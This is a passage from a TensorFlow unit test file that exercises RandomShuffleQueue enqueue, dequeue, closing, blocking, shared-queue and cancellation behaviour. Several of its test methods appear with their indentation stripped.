with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.test_session():
q = tf.RandomShuffleQueue(
10, 5, [tf.int32, tf.int32],
shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = tf.RandomShuffleQueue(10, 5, tf.int32, shapes=tf.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
  def testScalarShapes(self):
    """Mixed scalar and length-1 vector components round-trip intact."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(
          10, 0, [tf.int32, tf.int32],
          shapes=[(), (1,)])
      q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
      q.enqueue([9, [10]]).run()
      dequeue_t = q.dequeue()
      results = []
      # Two single-element dequeues...
      for _ in range(2):
        a, b = sess.run(dequeue_t)
        results.append((a, b))
      # ...then one batched dequeue for the remaining three elements.
      a, b = sess.run(q.dequeue_many(3))
      for i in range(3):
        results.append((a[i], b[i]))
      self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
                            results)
  def testParallelEnqueue(self):
    """Ten producer threads each enqueue one element; a single consumer
    then dequeues them all (order is random by design)."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(10, 0, tf.float32)
      elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
      enqueue_ops = [q.enqueue((x,)) for x in elems]
      dequeued_t = q.dequeue()
      # Run one producer thread for each element in elems.
      def enqueue(enqueue_op):
        sess.run(enqueue_op)
      threads = [self.checkedThread(target=enqueue, args=(e,))
                 for e in enqueue_ops]
      for thread in threads:
        thread.start()
      for thread in threads:
        thread.join()
      # Dequeue every element using a single thread.
      results = []
      for _ in xrange(len(elems)):
        results.append(dequeued_t.eval())
      self.assertItemsEqual(elems, results)
  def testParallelDequeue(self):
    """One thread enqueues everything; ten consumer threads each dequeue
    a single element. All elements must be seen exactly once."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(10, 0, tf.float32)
      elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
      enqueue_ops = [q.enqueue((x,)) for x in elems]
      dequeued_t = q.dequeue()
      # Enqueue every element using a single thread.
      for enqueue_op in enqueue_ops:
        enqueue_op.run()
      # Run one consumer thread for each element in elems.
      # NOTE(review): list.append is relied on to be thread-safe here
      # (CPython GIL) - the threads share `results` without a lock.
      results = []
      def dequeue():
        results.append(sess.run(dequeued_t))
      threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
      for thread in threads:
        thread.start()
      for thread in threads:
        thread.join()
      self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 0, tf.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
  def testEnqueueAndBlockingDequeue(self):
    """With min_after_dequeue=0 and capacity 3, a consumer blocked on an
    empty queue is unblocked once the producer starts enqueueing."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(3, 0, tf.float32)
      elems = [10.0, 20.0, 30.0]
      enqueue_ops = [q.enqueue((x,)) for x in elems]
      dequeued_t = q.dequeue()
      def enqueue():
        # The enqueue_ops should run after the dequeue op has blocked.
        # TODO(mrry): Figure out how to do this without sleeping.
        time.sleep(0.1)
        for enqueue_op in enqueue_ops:
          sess.run(enqueue_op)
      results = []
      def dequeue():
        for _ in xrange(len(elems)):
          results.append(sess.run(dequeued_t))
      enqueue_thread = self.checkedThread(target=enqueue)
      dequeue_thread = self.checkedThread(target=dequeue)
      enqueue_thread.start()
      dequeue_thread.start()
      enqueue_thread.join()
      dequeue_thread.join()
      self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(
10, 0, (tf.int32, tf.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = sess.run(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 5, tf.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 0, tf.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], size.eval())
dequeued_t.op.run()
self.assertEqual([0], size.eval())
def testEnqueueMany(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 0, tf.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 5, tf.float32)
empty_t = tf.constant([], dtype=tf.float32,
shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, size_t.eval())
enqueue_op.run()
self.assertEqual(0, size_t.eval())
def testEmptyDequeueMany(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 0, tf.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
  def testEmptyDequeueManyWithNoShape(self):
    """dequeue_many requires fully specified component shapes, even for 0."""
    with self.test_session():
      q = tf.RandomShuffleQueue(10, 0, tf.float32)
      enqueue_op = q.enqueue(
          (tf.constant([10.0, 20.0], shape=(1, 2)),))
      dequeued_t = q.dequeue_many(0)
      # Expect the operation to fail due to the shape not being constrained.
      with self.assertRaisesOpError(
          "requires the components to have specified shapes"):
        dequeued_t.eval()
      enqueue_op.run()
      # Unlike tf.Queue, RandomShuffleQueue does not make any
      # attempt to support DequeueMany with unspecified shapes, even if
      # a shape could be inferred from the elements enqueued.
      with self.assertRaisesOpError(
          "requires the components to have specified shapes"):
        dequeued_t.eval()
  def testMultiEnqueueMany(self):
    """enqueue_many with two components; dequeues preserve pairing."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(
          10, 0, (tf.float32, tf.int32))
      float_elems = [10.0, 20.0, 30.0, 40.0]
      int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
      enqueue_op = q.enqueue_many((float_elems, int_elems))
      dequeued_t = q.dequeue()
      enqueue_op.run()
      enqueue_op.run()
      results = []
      for _ in range(8):
        float_val, int_val = sess.run(dequeued_t)
        results.append((float_val, [int_val[0], int_val[1]]))
      # NOTE: list-concatenated zip() is Python 2 behaviour (zip returns a
      # list there).
      expected = zip(float_elems, int_elems) + zip(float_elems, int_elems)
      self.assertItemsEqual(expected, results)
  def testDequeueMany(self):
    """Two dequeue_many(5) calls drain ten enqueued elements."""
    with self.test_session():
      q = tf.RandomShuffleQueue(10, 0, tf.float32, ((),))
      elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
      enqueue_op = q.enqueue_many((elems,))
      dequeued_t = q.dequeue_many(5)
      enqueue_op.run()
      results = dequeued_t.eval().tolist()
      results.extend(dequeued_t.eval())
      self.assertItemsEqual(elems, results)
  def testMultiDequeueMany(self):
    """dequeue_many and dequeue on a two-component queue keep pairs intact.

    Also checks that the static shapes of the dequeued tensors match the
    shapes of the values actually produced.
    """
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(
          10, 0, (tf.float32, tf.int32),
          shapes=((), (2,)))
      float_elems = [
          10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
      int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10],
                   [11, 12], [13, 14], [15, 16], [17, 18], [19, 20]]
      enqueue_op = q.enqueue_many((float_elems, int_elems))
      dequeued_t = q.dequeue_many(4)
      dequeued_single_t = q.dequeue()
      enqueue_op.run()
      results = []
      float_val, int_val = sess.run(dequeued_t)
      self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
      self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
      results.extend(zip(float_val, int_val.tolist()))
      float_val, int_val = sess.run(dequeued_t)
      results.extend(zip(float_val, int_val.tolist()))
      float_val, int_val = sess.run(dequeued_single_t)
      self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
      self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
      results.append((float_val, int_val.tolist()))
      float_val, int_val = sess.run(dequeued_single_t)
      results.append((float_val, int_val.tolist()))
      self.assertItemsEqual(zip(float_elems, int_elems), results)
  def testHighDimension(self):
    """Round-trips rank-4 (4x4x4x4) elements through the queue."""
    with self.test_session():
      q = tf.RandomShuffleQueue(
          10, 0, tf.int32, ((4, 4, 4, 4)))
      elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
      enqueue_op = q.enqueue_many((elems,))
      dequeued_t = q.dequeue_many(10)
      enqueue_op.run()
      self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
  def testParallelEnqueueMany(self):
    """Ten threads each enqueue the same 100 elements; all 1000 come back."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(1000, 0, tf.float32, shapes=())
      elems = [10.0 * x for x in range(100)]
      enqueue_op = q.enqueue_many((elems,))
      dequeued_t = q.dequeue_many(1000)
      # Enqueue 100 items in parallel on 10 threads.
      def enqueue():
        sess.run(enqueue_op)
      threads = [self.checkedThread(target=enqueue) for _ in range(10)]
      for thread in threads:
        thread.start()
      for thread in threads:
        thread.join()
      self.assertItemsEqual(dequeued_t.eval(), elems * 10)
  def testParallelDequeueMany(self):
    """Ten threads each dequeue 100 of 1000 elements; union is complete."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(1000, 0, tf.float32, shapes=())
      elems = [10.0 * x for x in range(1000)]
      enqueue_op = q.enqueue_many((elems,))
      dequeued_t = q.dequeue_many(100)
      enqueue_op.run()
      # Dequeue 100 items in parallel on 10 threads.
      # NOTE: list.extend is not atomic in general, but each call appends
      # distinct elements, and checkedThread surfaces any thread failure.
      dequeued_elems = []
      def dequeue():
        dequeued_elems.extend(sess.run(dequeued_t))
      threads = [self.checkedThread(target=dequeue) for _ in range(10)]
      for thread in threads:
        thread.start()
      for thread in threads:
        thread.join()
      self.assertItemsEqual(elems, dequeued_elems)
  def testBlockingDequeueMany(self):
    """dequeue_many blocks until a concurrent enqueue supplies elements."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(10, 0, tf.float32, ((),))
      elems = [10.0, 20.0, 30.0, 40.0]
      enqueue_op = q.enqueue_many((elems,))
      dequeued_t = q.dequeue_many(4)
      dequeued_elems = []
      def enqueue():
        # The enqueue_op should run after the dequeue op has blocked.
        # TODO(mrry): Figure out how to do this without sleeping.
        time.sleep(0.1)
        sess.run(enqueue_op)
      def dequeue():
        dequeued_elems.extend(sess.run(dequeued_t).tolist())
      enqueue_thread = self.checkedThread(target=enqueue)
      dequeue_thread = self.checkedThread(target=dequeue)
      enqueue_thread.start()
      dequeue_thread.start()
      enqueue_thread.join()
      dequeue_thread.join()
      self.assertItemsEqual(elems, dequeued_elems)
  def testDequeueManyWithTensorParameter(self):
    """The batch size of dequeue_many may itself come from a dequeued tensor."""
    with self.test_session():
      # Define a first queue that contains integer counts.
      dequeue_counts = [random.randint(1, 10) for _ in range(100)]
      count_q = tf.RandomShuffleQueue(100, 0, tf.int32)
      enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
      total_count = sum(dequeue_counts)
      # Define a second queue that contains total_count elements.
      elems = [random.randint(0, 100) for _ in range(total_count)]
      q = tf.RandomShuffleQueue(
          total_count, 0, tf.int32, ((),))
      enqueue_elems_op = q.enqueue_many((elems,))
      # Define a subgraph that first dequeues a count, then DequeuesMany
      # that number of elements.
      dequeued_t = q.dequeue_many(count_q.dequeue())
      enqueue_counts_op.run()
      enqueue_elems_op.run()
      dequeued_elems = []
      for _ in dequeue_counts:
        dequeued_elems.extend(dequeued_t.eval())
      self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 2, tf.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
dequeued_t.eval()
  def testBlockingDequeueFromClosedQueue(self):
    """Dequeues block at min_after_dequeue; close() lifts that floor."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(10, 2, tf.float32)
      elems = [10.0, 20.0, 30.0, 40.0]
      enqueue_op = q.enqueue_many((elems,))
      close_op = q.close()
      dequeued_t = q.dequeue()
      enqueue_op.run()
      results = []
      def dequeue():
        for _ in elems:
          results.append(sess.run(dequeued_t))
        self.assertItemsEqual(elems, results)
        # Expect the operation to fail due to the queue being closed.
        with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
                                     "is closed and has insufficient"):
          sess.run(dequeued_t)
      dequeue_thread = self.checkedThread(target=dequeue)
      dequeue_thread.start()
      # The close_op should run after the dequeue_thread has blocked.
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      # The dequeue thread blocked when it hit the min_size requirement.
      self.assertEqual(len(results), 2)
      close_op.run()
      dequeue_thread.join()
      # Once the queue is closed, the min_size requirement is lifted.
      self.assertEqual(len(results), 4)
  def testBlockingDequeueFromClosedEmptyQueue(self):
    """A blocked dequeue on an empty queue fails once the queue is closed."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(10, 0, tf.float32)
      close_op = q.close()
      dequeued_t = q.dequeue()
      finished = []  # Needs to be a mutable type
      def dequeue():
        # Expect the operation to fail due to the queue being closed.
        with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
                                     "is closed and has insufficient"):
          sess.run(dequeued_t)
        finished.append(True)
      dequeue_thread = self.checkedThread(target=dequeue)
      dequeue_thread.start()
      # The close_op should run after the dequeue_thread has blocked.
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      self.assertEqual(len(finished), 0)
      close_op.run()
      dequeue_thread.join()
      self.assertEqual(len(finished), 1)
  def testBlockingDequeueManyFromClosedQueue(self):
    """A second dequeue_many blocks on an emptied queue, then fails on close."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(10, 0, tf.float32, ((),))
      elems = [10.0, 20.0, 30.0, 40.0]
      enqueue_op = q.enqueue_many((elems,))
      close_op = q.close()
      dequeued_t = q.dequeue_many(4)
      enqueue_op.run()
      progress = []  # Must be mutable
      def dequeue():
        self.assertItemsEqual(elems, sess.run(dequeued_t))
        progress.append(1)
        # Expect the operation to fail due to the queue being closed.
        with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
                                     "is closed and has insufficient"):
          sess.run(dequeued_t)
        progress.append(2)
      self.assertEqual(len(progress), 0)
      dequeue_thread = self.checkedThread(target=dequeue)
      dequeue_thread.start()
      # The close_op should run after the dequeue_thread has blocked.
      # TODO(mrry): Figure out how to do this without sleeping.
      for _ in range(100):
        time.sleep(0.01)
        if len(progress) == 1: break
      self.assertEqual(len(progress), 1)
      time.sleep(0.01)
      close_op.run()
      dequeue_thread.join()
      self.assertEqual(len(progress), 2)
  def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
    """Closing with fewer elements than a blocked dequeue_many needs fails it.

    The leftover element is then drained with a size-driven dequeue_many.
    """
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(10, 0, tf.float32, ((),))
      elems = [10.0, 20.0, 30.0, 40.0]
      enqueue_op = q.enqueue_many((elems,))
      close_op = q.close()
      dequeued_t = q.dequeue_many(3)
      cleanup_dequeue_t = q.dequeue_many(q.size())
      enqueue_op.run()
      results = []
      def dequeue():
        results.extend(sess.run(dequeued_t))
        # Expect the operation to fail due to the queue being closed.
        with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
                                     "is closed and has insufficient"):
          sess.run(dequeued_t)
        # However, the last result was dequeued before the queue was closed,
        # so nothing more is added to results.
        results.extend(sess.run(cleanup_dequeue_t))
      dequeue_thread = self.checkedThread(target=dequeue)
      dequeue_thread.start()
      # The close_op should run after the dequeue_thread has blocked.
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      self.assertEqual(len(results), 3)
      close_op.run()
      dequeue_thread.join()
      self.assertEqual(len(results), 3)
  def testBlockingDequeueManyFromClosedEmptyQueue(self):
    """A blocked dequeue_many on an empty queue fails when it is closed."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(10, 5, tf.float32, ((),))
      close_op = q.close()
      dequeued_t = q.dequeue_many(4)
      def dequeue():
        # Expect the operation to fail due to the queue being closed.
        with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
                                     "is closed and has insufficient"):
          sess.run(dequeued_t)
      dequeue_thread = self.checkedThread(target=dequeue)
      dequeue_thread.start()
      # The close_op should run after the dequeue_thread has blocked.
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      close_op.run()
      dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 4, tf.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.AbortedError, "is closed"):
enqueue_op.run()
  def testEnqueueManyToClosedQueue(self):
    """enqueue_many after close() raises AbortedError."""
    with self.test_session():
      q = tf.RandomShuffleQueue(10, 5, tf.float32, ((),))
      elems = [10.0, 20.0, 30.0, 40.0]
      enqueue_op = q.enqueue_many((elems,))
      close_op = q.close()
      enqueue_op.run()
      close_op.run()
      # Expect the operation to fail due to the queue being closed.
      with self.assertRaisesRegexp(tf.errors.AbortedError, "is closed"):
        enqueue_op.run()
  def testBlockingEnqueueToFullQueue(self):
    """enqueue on a full queue blocks until a dequeue frees a slot."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(4, 0, tf.float32, ((),))
      elems = [10.0, 20.0, 30.0, 40.0]
      enqueue_op = q.enqueue_many((elems,))
      blocking_enqueue_op = q.enqueue((50.0,))
      dequeued_t = q.dequeue()
      enqueue_op.run()
      def blocking_enqueue():
        sess.run(blocking_enqueue_op)
      thread = self.checkedThread(target=blocking_enqueue)
      thread.start()
      # The dequeue ops should run after the blocking_enqueue_op has blocked.
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      results = []
      for _ in elems:
        results.append(dequeued_t.eval())
      results.append(dequeued_t.eval())
      self.assertItemsEqual(elems + [50.0], results)
      # There wasn't room for 50.0 in the queue when the first element was
      # dequeued.
      self.assertNotEqual(50.0, results[0])
      thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(4, 0, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
  def testBlockingEnqueueToClosedQueue(self):
    """close() waits for a pending blocked enqueue; later enqueues abort."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(4, 0, tf.float32, ((),))
      elems = [10.0, 20.0, 30.0, 40.0]
      enqueue_op = q.enqueue_many((elems,))
      blocking_enqueue_op = q.enqueue((50.0,))
      dequeued_t = q.dequeue()
      close_op = q.close()
      enqueue_op.run()
      def blocking_enqueue():
        # Expect the operation to succeed since it will complete
        # before the queue is closed.
        sess.run(blocking_enqueue_op)
        # Expect the operation to fail due to the queue being closed.
        with self.assertRaisesRegexp(tf.errors.AbortedError, "closed"):
          sess.run(blocking_enqueue_op)
      thread1 = self.checkedThread(target=blocking_enqueue)
      thread1.start()
      # The close_op should run after the first blocking_enqueue_op has blocked.
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      def blocking_close():
        sess.run(close_op)
      thread2 = self.checkedThread(target=blocking_close)
      thread2.start()
      # Wait for the close op to block before unblocking the enqueue.
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      results = []
      # Dequeue to unblock the first blocking_enqueue_op, after which the
      # close will complete.
      results.append(dequeued_t.eval())
      self.assertTrue(results[0] in elems)
      thread2.join()
      thread1.join()
  def testBlockingEnqueueManyToClosedQueue(self):
    """A partially completed enqueue_many interacts correctly with close()."""
    with self.test_session() as sess:
      q = tf.RandomShuffleQueue(4, 0, tf.float32, ((),))
      elems = [10.0, 20.0, 30.0]
      enqueue_op = q.enqueue_many((elems,))
      blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
      close_op = q.close()
      size_t = q.size()
      enqueue_op.run()
      self.assertEqual(size_t.eval(), 3)
      def blocking_enqueue():
        # This will block until the dequeue after the close.
        sess.run(blocking_enqueue_op)
        # At this point the close operation will become unblocked, so the
        # next enqueue will fail.
        with self.assertRaisesRegexp(tf.errors.AbortedError, "closed"):
          sess.run(blocking_enqueue_op)
      thread1 = self.checkedThread(target=blocking_enqueue)
      thread1.start()
      # The close_op should run after the blocking_enqueue_op has blocked.
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      # First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
      # elements, and is blocked waiting for one more element to be dequeue.
      self.assertEqual(size_t.eval(), 4)
      def blocking_close():
        sess.run(close_op)
      thread2 = self.checkedThread(target=blocking_close)
      thread2.start()
      # The close_op should run before the second blocking_enqueue_op
      # has started.
      # TODO(mrry): Figure out how to do this without sleeping.
      time.sleep(0.1)
      # Unblock the first blocking_enqueue_op in blocking_enqueue.
      q.dequeue().eval()
      thread2.join()
      thread1.join()
  def testSharedQueueSameSession(self):
    """Two queues with the same shared_name share state within a session."""
    with self.test_session():
      q1 = tf.RandomShuffleQueue(
          1, 0, tf.float32, ((),), shared_name="shared_queue")
      q1.enqueue((10.0,)).run()
      q2 = tf.RandomShuffleQueue(
          1, 0, tf.float32, ((),), shared_name="shared_queue")
      q1_size_t = q1.size()
      q2_size_t = q2.size()
      self.assertEqual(q1_size_t.eval(), 1)
      self.assertEqual(q2_size_t.eval(), 1)
      self.assertEqual(q2.dequeue().eval(), 10.0)
      self.assertEqual(q1_size_t.eval(), 0)
      self.assertEqual(q2_size_t.eval(), 0)
      q2.enqueue((20.0,)).run()
      self.assertEqual(q1_size_t.eval(), 1)
      self.assertEqual(q2_size_t.eval(), 1)
      self.assertEqual(q1.dequeue().eval(), 20.0)
      self.assertEqual(q1_size_t.eval(), 0)
      self.assertEqual(q2_size_t.eval(), 0)
  def testIncompatibleSharedQueueErrors(self):
    """Sharing a queue with mismatched attributes fails at resource creation.

    Each pair differs in exactly one attribute (capacity, min_after_dequeue,
    component types, shapes, or seeds); the second queue_ref must error.
    """
    with self.test_session():
      q_a_1 = tf.RandomShuffleQueue(
          10, 5, tf.float32, shared_name="q_a")
      q_a_2 = tf.RandomShuffleQueue(
          15, 5, tf.float32, shared_name="q_a")
      q_a_1.queue_ref.eval()
      with self.assertRaisesOpError("capacity"):
        q_a_2.queue_ref.eval()
      q_b_1 = tf.RandomShuffleQueue(
          10, 0, tf.float32, shared_name="q_b")
      q_b_2 = tf.RandomShuffleQueue(
          10, 5, tf.float32, shared_name="q_b")
      q_b_1.queue_ref.eval()
      with self.assertRaisesOpError("min_after_dequeue"):
        q_b_2.queue_ref.eval()
      q_c_1 = tf.RandomShuffleQueue(
          10, 5, tf.float32, shared_name="q_c")
      q_c_2 = tf.RandomShuffleQueue(
          10, 5, tf.int32, shared_name="q_c")
      q_c_1.queue_ref.eval()
      with self.assertRaisesOpError("component types"):
        q_c_2.queue_ref.eval()
      q_d_1 = tf.RandomShuffleQueue(
          10, 5, tf.float32, shared_name="q_d")
      q_d_2 = tf.RandomShuffleQueue(
          10, 5, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
      q_d_1.queue_ref.eval()
      with self.assertRaisesOpError("component shapes"):
        q_d_2.queue_ref.eval()
      q_e_1 = tf.RandomShuffleQueue(
          10, 5, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
      q_e_2 = tf.RandomShuffleQueue(
          10, 5, tf.float32, shared_name="q_e")
      q_e_1.queue_ref.eval()
      with self.assertRaisesOpError("component shapes"):
        q_e_2.queue_ref.eval()
      q_f_1 = tf.RandomShuffleQueue(
          10, 5, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
      q_f_2 = tf.RandomShuffleQueue(
          10, 5, tf.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
      q_f_1.queue_ref.eval()
      with self.assertRaisesOpError("component shapes"):
        q_f_2.queue_ref.eval()
      q_g_1 = tf.RandomShuffleQueue(
          10, 5, tf.float32, shared_name="q_g")
      q_g_2 = tf.RandomShuffleQueue(
          10, 5, (tf.float32, tf.int32), shared_name="q_g")
      q_g_1.queue_ref.eval()
      with self.assertRaisesOpError("component types"):
        q_g_2.queue_ref.eval()
      q_h_1 = tf.RandomShuffleQueue(
          10, 5, tf.float32, seed=12, shared_name="q_h")
      q_h_2 = tf.RandomShuffleQueue(
          10, 5, tf.float32, seed=21, shared_name="q_h")
      q_h_1.queue_ref.eval()
      with self.assertRaisesOpError("random seeds"):
        q_h_2.queue_ref.eval()
def testSelectQueue(self):
with self.test_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
tf.RandomShuffleQueue(10, 0, tf.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = tf.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.test_session():
q1 = tf.RandomShuffleQueue(10, 0, tf.float32)
q2 = tf.RandomShuffleQueue(15, 0, tf.float32)
enq_q = tf.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("Index must be in the range"):
enq_q.dequeue().eval()
  def _blockingDequeue(self, sess, dequeue_op):
    # Helper: runs a dequeue that is expected to block and then be cancelled
    # (e.g. by closing the session).
    with self.assertRaisesOpError("Dequeue operation was cancelled"):
      sess.run(dequeue_op)
  def _blockingDequeueMany(self, sess, dequeue_many_op):
    # Helper: as _blockingDequeue, for dequeue_many ops.
    with self.assertRaisesOpError("Dequeue operation was cancelled"):
      sess.run(dequeue_many_op)
  def _blockingEnqueue(self, sess, enqueue_op):
    # Helper: runs an enqueue that is expected to block and then be cancelled.
    with self.assertRaisesOpError("Enqueue operation was cancelled"):
      sess.run(enqueue_op)
  def _blockingEnqueueMany(self, sess, enqueue_many_op):
    # Helper: as _blockingEnqueue, for enqueue_many ops.
    with self.assertRaisesOpError("Enqueue operation was cancelled"):
      sess.run(enqueue_many_op)
  def testResetOfBlockingOperation(self):
    """Closing the session cancels all four kinds of blocked queue ops."""
    with self.test_session() as sess:
      q_empty = tf.RandomShuffleQueue(
          5, 0, tf.float32, ((),))
      dequeue_op = q_empty.dequeue()
      dequeue_many_op = q_empty.dequeue_many(1)
      q_full = tf.RandomShuffleQueue(5, 0, tf.float32, ((),))
      sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
      enqueue_op = q_full.enqueue((6.0,))
      enqueue_many_op = q_full.enqueue_many(([6.0],))
      threads = [
          self.checkedThread(self._blockingDequeue, args=(sess, dequeue_op)),
          self.checkedThread(self._blockingDequeueMany, args=(sess,
                                                              dequeue_many_op)),
          self.checkedThread(self._blockingEnqueue, args=(sess, enqueue_op)),
          self.checkedThread(self._blockingEnqueueMany, args=(sess,
                                                              enqueue_many_op))]
      for t in threads:
        t.start()
      time.sleep(0.1)
      sess.close()  # Will cancel the blocked operations.
      for t in threads:
        t.join()
  def testDequeueManyInDifferentOrders(self):
    """Different seeds produce different dequeue_many orders."""
    with self.test_session():
      # Specify seeds to make the test deterministic
      # (https://en.wikipedia.org/wiki/Taxicab_number).
      q1 = tf.RandomShuffleQueue(10, 5, tf.int32,
                                 ((),), seed=1729)
